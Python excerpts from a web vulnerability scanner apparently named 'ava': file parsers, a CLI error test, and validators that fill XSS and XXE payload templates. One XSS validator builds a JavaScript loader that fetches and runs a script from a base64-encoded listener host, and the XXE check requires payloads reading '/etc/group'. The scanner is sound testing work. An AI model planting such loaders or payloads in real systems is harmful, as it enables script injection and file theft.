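    def parse(self, configs):
        """
        Parses a list of HAR files. Vectors from each HAR file are combined and returned as a list.
        Each file named in self._sources is loaded as JSON, the 'request' object of every entry under
        log.entries is collected, and the requests are handed to self._parse_requests.
        :param configs: AVA configs
        :return: list of vectors as dictionaries
        :raises InvalidFormatException: a file is not valid JSON, a required HAR key is missing, or a
                                        level of the log/entries/request structure is not the expected
                                        container
        """
        combined = []

        # parse each vector file in list
        for name in self._sources:
            logger.debug("Reading vectors from '%s'.", name)

            try:
                # load HAR as json; HAR is JSON and therefore UTF-8, so do not depend on the
                # platform default encoding
                with open(name, encoding="utf-8") as f:
                    har = json.load(f)

                # get requests
                requests = [
                    entry['request'] for entry in har['log']['entries']
                ]
            except JSONDecodeError as e:
                raise InvalidFormatException(e) from e
            except KeyError as e:
                raise InvalidFormatException("{} missing in '{}'".format(
                    e, name)) from e
            except TypeError as e:
                # e.g. 'entries' holding strings instead of objects: indexing then raises
                # TypeError rather than KeyError, which is still a malformed HAR file
                raise InvalidFormatException(
                    "Unexpected HAR structure in '{}': {}".format(name, e)) from e

            # parse requests; a KeyError here means a request object lacks a field the
            # parser needs, which is reported the same way as a missing HAR key
            try:
                vectors = self._parse_requests(requests, configs, name)
            except KeyError as e:
                raise InvalidFormatException("{} missing in '{}'".format(
                    e, name)) from e

            # combine
            combined.extend(vectors)

        return combined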
    def _parse_multipart(self, multipart_string, content_type):
        """
        Parse multipart data string and return decoder object.
        Body and content-type problems are both surfaced as InvalidFormatException, with
        distinct messages, so callers only have to handle one error type.
        :param multipart_string: multipart data string
        :param content_type: content-type string
        :return: Multipart decoder
        """
        try:
            # the encode() call stays inside the try: AttributeError presumably covers a
            # non-str multipart_string here (no .encode) — confirm against callers
            encoded = multipart_string.encode()
            decoder = MultipartDecoder(encoded, content_type)
        except ImproperBodyPartContentException:
            raise InvalidFormatException("Unable to parse multipart form data")
        except (NonMultipartContentTypeException, AttributeError):
            raise InvalidFormatException(
                "Unable to parse multipart content-type")
        else:
            return decoder
File: xxe.py Project: zhaoyun95/ava
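 def _check_payloads(self, payloads):
     """
     Checks if the payloads are adoptable for this class and modify the payloads to adjust to check function.
     InvalidFormatException is raised, if a payload is not adoptable.
     Children can override.
     This class only validates: every payload must mention '/etc/group' (presumably because the
     check function looks for that file's contents in the response — confirm against the check),
     and the list is returned unchanged.
     :param payloads: list of payloads
     :return: list of modified payloads
     """
     # payloads are only inspected, never rewritten, so no index is needed
     for payload in payloads:
         if '/etc/group' not in payload:
             raise InvalidFormatException("Payload of {} must include '/etc/group'".format(self.key))
     return payloads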
File: xss.py Project: zhaoyun95/ava
 def _check_payloads(self, payloads):
     """
     Checks if the payloads are adoptable for this class and modify the payloads to adjust to check function.
     InvalidFormatException is raised, if a payload is not adoptable.
     Every payload must carry a '{}' marker, which is replaced with the listener (self._listener).
     The list is rewritten in place and also returned.
     :param payloads: list of payloads
     :return: list of modified payloads
     """
     marker = '{}'
     for index, template in enumerate(payloads):
         if marker not in template:
             message = "Payload of {} must include '{{}}'".format(self.key)
             raise InvalidFormatException(message)
         # in-place assignment so the caller's list is updated as well as returned
         payloads[index] = template.format(self._listener)
     return payloads
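    def parse(self):
        """
        Parses YAML configuration file and creates configs in the same format as default configs. Default configs
        is checked to verify data types. None values are filtered from lists to prevent evaluating to True later.
        :return: dictionary of configs, empty if the file holds no data
        :raises InvalidFormatException: the file is not valid YAML, its top level is not a mapping,
                                        or a value does not have the type the schema requires
        :raises UnknownKeyException: a key is not present in the schema
        """
        try:
            # read yaml; safe_load builds plain Python objects only, never arbitrary tagged ones
            with open(self._source, encoding="utf-8") as f:
                configs = yaml.safe_load(f)
        except (ParserError, ScannerError) as e:
            # problem and problem_mark can be absent on a marked error; use the error's own
            # text then rather than failing inside the handler
            if e.problem is None or e.problem_mark is None:
                raise InvalidFormatException(str(e)) from e
            # Mark.line is zero-based; report it one-based like PyYAML's own messages and editors do
            raise InvalidFormatException("{} on line {}".format(
                e.problem.capitalize(), e.problem_mark.line + 1)) from e

        # check configs
        if not configs:
            logger.debug("Configuration file '%s' is empty. Ignoring.",
                         self._source)
            return {}

        # a YAML document may also be a list or a scalar; only a mapping can be a config,
        # and .items() below would fail on anything else
        if not isinstance(configs, dict):
            raise InvalidFormatException(
                "Configuration file '{}' must be a mapping of keys to values".format(
                    self._source))

        for key, values in configs.items():
            # check key
            if key not in self._schema:
                raise UnknownKeyException(
                    "'{}' is not a valid configuration".format(key))

            # check values; a None value is kept as-is and not type checked
            if values is None:
                continue

            # check type; NOTE(review): bool is a subclass of int, so a YAML true/false
            # passes an int entry of the schema unchanged
            if not isinstance(values, self._schema[key]):
                raise InvalidFormatException("'{}' must be a {}".format(
                    key, self._schema[key].__name__))

            # filter none from lists; NOTE(review): filter(None, ...) also drops 0, '' and
            # False, not only None. Reassigning an existing key while iterating is safe
            # because the dictionary's size does not change.
            if isinstance(values, list):
                configs[key] = list(filter(None, values))

        return configs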
    def _parse_json(self, json_string):
        """
        Parse JSON string and return object.
        A string that does not decode is reported as InvalidFormatException so callers
        only have to handle one error type.
        :param json_string: JSON as string
        :return: JSON as object
        """
        try:
            parsed = json.loads(json_string)
        except JSONDecodeError:
            raise InvalidFormatException("Unable to parse JSON")
        else:
            return parsed
File: xss.py Project: zhaoyun95/ava
 def _check_payloads(self, payloads):
     """
     Checks if the payloads are adoptable for this class and modify the payloads to adjust to check function.
     InvalidFormatException is raised, if a payload is not adoptable.
     Children can override.
     Every payload must contain a tag whose name is the '{}' marker; the marker is filled with
     self._random for both the opening and the closing tag. The list is rewritten in place.
     :param payloads: list of payloads
     :return: list of modified payloads
     """
     for index, template in enumerate(payloads):
         if '<{}' not in template:
             raise InvalidFormatException(
                 "Payload of {} must have a tag named '{{}}'".format(self.key))
         # the same value is passed twice so opening and closing tag match
         # (assumes self._random is stable across reads — confirm)
         payloads[index] = template.format(self._random, self._random)
     return payloads
File: xml.py Project: zhaoyun95/ava
    def _parse_xml(self, xml_string):
        """
        Parse the XML string and return the root element.
        A string that is not well-formed XML is reported as InvalidFormatException.
        NOTE(review): ElementTree expands internal entities, and depending on the linked Expat
        version deeply nested entity definitions in an untrusted document can consume a lot of
        memory; if xml_string can originate from an untrusted party, confirm whether a hardened
        parser is wanted here.
        :param xml_string: XML as string
        :return: root element
        """
        try:
            parsed_root = ElementTree.fromstring(xml_string)
        except ParseError:
            raise InvalidFormatException("Unable to parse XML string")
        else:
            return parsed_root
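 def _check_payloads(self, payloads):
     """
     Checks if the payloads are adoptable for this class and modify the payloads to adjust to check function.
     InvalidFormatException is raised, if a payload is not adoptable.
     Two '{}' markers are required anywhere in the payload, as the error message states; they are
     replaced, in order, with the scheme and the network location (host and port) of the listener
     URL. The list is rewritten in place and also returned.
     :param payloads: list of payloads
     :return: list of modified payloads
     """
     # parse url
     parsed = urlparse(self._listener)
     # search, not match: re.match anchored the first '{}' at the very start of the
     # payload, rejecting payloads the message promises to accept; DOTALL so a newline
     # between the two markers does not break the check either
     marker_pair = re.compile(r"\{\}.*\{\}", re.DOTALL)
     for i, payload in enumerate(payloads):
         if marker_pair.search(payload) is None:
             raise InvalidFormatException(
                 "Payload of {} must include two of '{{}}' which will be replaced with scheme and host name"
                 .format(self.key))
         payloads[i] = payload.format(parsed.scheme, parsed.netloc)
     return payloads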
File: xss.py Project: zhaoyun95/ava
    def _check_payloads(self, payloads):
        """
        Checks if the payloads are adoptable for this class and modify the payloads to adjust to check function.
        InvalidFormatException is raised, if a payload is not adoptable.
        The listener URL is base64-encoded into a fixed loader script once; every payload must
        contain a '{}' marker, which is replaced with that script. The list is rewritten in place.
        :param payloads: list of payloads
        :return: list of modified payloads
        """
        # encode listener and format script
        encoded_listener = base64.b64encode(self._listener.encode()).decode()
        loader = (
            "s=document.createElement('script');s.src=atob('{}');document.head.appendChild(s);"
        ).format(encoded_listener)

        # generate payloads
        for index, template in enumerate(payloads):
            if '{}' not in template:
                raise InvalidFormatException("Payload of {} must include '{{}}'".format(self.key))
            payloads[index] = template.format(loader)
        return payloads
def test_main_negative(mocker):
    """
    Every error path of ava.scanner.main must end in exit status 2.
    Each case lists the CLI args and the patches applied before the call. Patches persist
    for the rest of the test, so the cases depend on this order and must not be reordered.
    """
    cases = [
        # missing vector file
        ([], []),
        # vector file not exists
        (["test.json"],
         [("os.path.isfile", {"return_value": False})]),
        # config reader missing component
        (["-c", "config.yml", "test.json"],
         [("os.path.isfile", {"return_value": True}),
          ("ava.scanner._parse_yaml",
           {"side_effect": MissingComponentException("Missing config file")})]),
        # config reader invalid format
        (["-c", "config.yml", "test.json"],
         [("os.path.isfile", {"return_value": True}),
          ("ava.scanner._parse_yaml",
           {"side_effect": InvalidFormatException("Invalid config file format")})]),
        # config reader unknown key
        (["-c", "config.yml", "test.json"],
         [("os.path.isfile", {"return_value": True}),
          ("ava.scanner._parse_yaml",
           {"side_effect": UnknownKeyException("Unknown config file key")})]),
        # config generate invalid value
        (["test.json"],
         [("os.path.isfile", {"return_value": True}),
          ("ava.common.config.generate",
           {"side_effect": InvalidValueException("Config invalid value")})]),
        # config generate unknown key
        (["test.json"],
         [("os.path.isfile", {"return_value": True}),
          ("ava.common.config.generate",
           {"side_effect": UnknownKeyException("Config unknown key")})]),
        # run scanner missing component
        (["test.json"],
         [("os.path.isfile", {"return_value": True}),
          ("ava.common.config.generate", {}),
          ("ava.scanner._run_scanner",
           {"side_effect": MissingComponentException("Run missing component")})]),
        # run scanner invalid format
        (["test.json"],
         [("os.path.isfile", {"return_value": True}),
          ("ava.common.config.generate", {}),
          ("ava.scanner._run_scanner",
           {"side_effect": InvalidFormatException("Invalid JSON format")})]),
    ]

    for args, patches in cases:
        for target, options in patches:
            mocker.patch(target, **options)
        assert ava.scanner.main(args) == 2